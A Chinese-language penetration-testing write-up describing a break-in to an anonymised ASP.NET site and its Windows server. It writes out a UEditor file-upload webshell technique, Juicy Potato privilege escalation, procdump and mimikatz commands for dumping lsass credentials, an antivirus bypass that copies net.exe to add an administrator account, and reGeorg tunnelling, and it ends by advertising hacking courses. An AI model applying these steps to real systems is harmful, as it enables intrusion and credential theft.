一次Bypass某绒的渗透测试

admin 2022年10月1日20:46:58评论21 views字数 2514阅读8分22秒阅读模式
一次Bypass某绒的渗透测试


来源https://bbs.ichunqiu.com/thread-59481-1-1.html


本次教程较为基础,打码比较严重,有很多不足的地方,希望各位大佬能够指正。

目标站:http://xxx.com  要求:登录远程桌面

通过 超级ping 检测出网站的IP 直接访问ip ...

一次Bypass某绒的渗透测试

通过FOFA Pro View 这个插件可以快速的扫描出开放的端口 

(由于更新,之前的不能用了,修改下地址就可以了)

一次Bypass某绒的渗透测试

还有Wappalyzer 这个插件也比较好用快速检测出网站的中间件等

一次Bypass某绒的渗透测试

这里我比较疑惑asp.net 一般都是搭配mssql数据库吧,它上面显示开放3306。。。我访问一下直接 403

目录扫描扫出了后台

一次Bypass某绒的渗透测试

尝试下弱口令  

一次Bypass某绒的渗透测试

一次Bypass某绒的渗透测试

他这里会校验用户名, 通过检测不会对访问次数进行限制 ,那还等啥~

burp一梭跑, 刚好让他尝尝我大字典的厉害

一次Bypass某绒的渗透测试

最终我还是败了,啥也别说了,上神器xray(下载地址后台回复:”Xray “)

出来打工,之前白嫖的高级版还没上手,今天试试水

贴出xray的官方使用说明 https://docs.xray.cool/#/tutorial/introduce 

这款工具还是蛮好用的,啥也不说,开干(我懒,就使用基础爬虫+扫描网站了)。

一次Bypass某绒的渗透测试

。。。有点尬  只能手动测试下了, 习惯性的查看一下有没有目录遍历漏洞 

(我自己的手法: 找到一张图片->右键复制地址到地址栏->查看相关路径->访问)

(注意:图片一般最好选择文章或者资料里面的 别问,问就是直觉)

一次Bypass某绒的渗透测试

哦啊,没发现目录遍历但是发现了ueditor,联想到之前插件扫到的web框架是 .net的 有篇文章是专门讲解有关

Ueditor .net下的漏洞的 https://www.freebuf.com/vuls/181814.html

先访问一下路径显示

一次Bypass某绒的渗透测试

利用poc上传(自己构造好html上传界面,然后上传自己服务器上的图片马用 ? 进行截断就可以了)

(服务器:白嫖一年彩虹云云主机 图片马: 非常简单,我们只需要一张图片1.jpg 一句话木马写好的aspx文件 1.aspx,之后我们进入到命令行。注意:将aspx文件和图片文件放到同一目录下,cmd也要跳转到放文件的目录下
之后执行命令 *copy* 1.jpg/b + 1.aspx/a 2.jpg  新生成的2.jpg就是我们制作好的图片马了。)

将POC中的url更换成我们的目标站,上传格式 http://myweb.com/1.jpg?.aspx

一次Bypass某绒的渗透测试

一次Bypass某绒的渗透测试

上传成功 直接返回一句话地址

一次Bypass某绒的渗透测试

成功解析,上菜刀

一次Bypass某绒的渗透测试

成功getshell ,查看下权限

一次Bypass某绒的渗透测试

这权限属实有点小,不过还能执行命令  ipconfig 发现是 内网。。。怪不得

一次Bypass某绒的渗透测试

Systeminfo

一次Bypass某绒的渗透测试

一次Bypass某绒的渗透测试

2012 修补了8个补丁 先祭出神站

https://bugs.hacking8.com/tiquan/ 在线 exp对比,非常值得推荐

这里看到2012 啥也别说烂土豆一梭跑

发现上传不上。。。

一次Bypass某绒的渗透测试

刚开始我以为是权限的问题后来发现每个文件夹我都不能上传。。。

搞得我一脸懵* 是不是因为菜刀的问题 ,

那就直接先写入一个aspx的查询可读可写目录的马子

一次Bypass某绒的渗透测试

成功写入并查询成功 然后新建一个大马

一次Bypass某绒的渗透测试

不是吧,这么难的吗?还好我有预编译出错的shell

一次Bypass某绒的渗透测试

成功 ,然后配合我的可读可写的马子, 成功上传烂土豆

一次Bypass某绒的渗透测试

提权成功 get到system 权限 接下来就是找3389了 netstat -ano

一次Bypass某绒的渗透测试

看到一个 33890 越看越像3389 tasklist -svc : 查看系统进程 找到对应的pid

一次Bypass某绒的渗透测试

一次Bypass某绒的渗透测试

不得不吐槽一下这个管理员 真的有点2...

3389端口到手,内网IP到手,system权限到手,接下来直接添加账号登录了

Net user abc abc /add 添加账号

net localgroup administrators abc /add 将用户添加到管理员组

执行命令发现无回显,刚开始以为对账号密码的长度有限制,但是测试了很多次发现不是这个问题,

明明是system权限为什么不能添加用户呢?

在白天打工的时候用手机找到很多类似对应的情况:有杀软、对账号密码有限制、防火墙等等 并且从网上找到了很多绕过的姿势 ,晚上回到家二话不说就开干,tasklist -svc

一次Bypass某绒的渗透测试

经过我一个一个的百度,终于发现了问题所在 原来存在火绒。。。(对杀毒软件进程不是很了解)

其实这里我想说明一下,很多人习惯性的遇到一点很问题就问别人,其实完全可以自己先百度一下,这样不仅可以加深对问题的记忆,将来在遇到同类型问题的时候也可以快速的找到解决的思路

利用白天找到的思路,可以先kill掉火绒的进程

这里我就直接贴出方法 https://jingyan.baidu.com/article/656db9183f65c0e381249c83.html

但是事情往往是那么的不尽人意

一次Bypass某绒的渗透测试

。。。n m 玩鸡毛 再试试另一种方法,直接mimimakatz读取administrator的密码

但是这里是server2012 尝试使用procdump来导出目标主机的lsass.dmp 到本机用mimikatz读取密码

1.导出lsass.exe
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

2.执行mimikatz
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

(前提需要管理员权限)

读出了hash没读出明文密码

一次Bypass某绒的渗透测试

Sha1解密不出来 还尝试了很多姿势,都没有成功,只能求助大佬了

一次Bypass某绒的渗透测试

啥话不说直接开干

copy C:WindowsSystem32net.exe /net1.exe

一次Bypass某绒的渗透测试

成功绕过并添加到了管理员组,由于是内网我们直接上 Proxifier+reGeorg

相关使用方法可以参考:https://www.freebuf.com/column/206524.html 进行了解

一次Bypass某绒的渗透测试

任务完成 打扫战场 收工

总结:

安装相关浏览器插件会很方便的进行信息收集

遇到问题不要一股脑的问别人,先想办法自己解决

多收集一些好用的工具、网站等,用的时候直接就能甩过来

多总结自己的经验和收获,这样你才能在实战中快速上手


零基础学黑客


一次Bypass某绒的渗透测试

(黑客教程免费领)


一次Bypass某绒的渗透测试


原文始发于微信公众号(渗透师老A):一次Bypass某绒的渗透测试

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月1日20:46:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一次Bypass某绒的渗透测试http://cn-sec.com/archives/788715.html

发表评论

匿名网友 填写信息